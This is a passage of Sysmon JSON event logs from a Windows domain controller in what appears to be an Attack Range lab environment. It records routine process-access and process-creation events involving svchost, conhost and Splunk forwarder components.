8-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4295,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.610\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.610","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4296,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.610\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.610","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4297,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.610\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.610","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4298,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.610\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.610","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4299,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.610\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20B4-5F25-0000-001008550600}\r\nTargetProcessId: 4136\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.610","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20B4-5F25-0000-001008550600}","TargetProcessId":"4136","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4300,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.751\r\nSourceProcessGUID: {41C8662E-20B4-5F25-0000-001008550600}\r\nSourceProcessId: 4136\r\nSourceThreadId: 4932\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.751","SourceProcessGUID":"{41C8662E-20B4-5F25-0000-001008550600}","SourceProcessId":"4136","SourceThreadId":"4932","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4301,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:45.752\r\nProcessGuid: {41C8662E-20B5-5F25-0000-001058570600}\r\nProcessId: 4868\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:45.752","ProcessGuid":"{41C8662E-20B5-5F25-0000-001058570600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4302,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:45.751\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-20B5-5F25-0000-001058570600}\r\nTargetProcessId: 4868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:45.751","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20B5-5F25-0000-001058570600}","TargetProcessId":"4868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4303,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:45.751\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20B5-5F25-0000-001058570600}\r\nTargetProcessId: 4868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:45.751","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20B5-5F25-0000-001058570600}","TargetProcessId":"4868","TargetImage":"C:\\Program 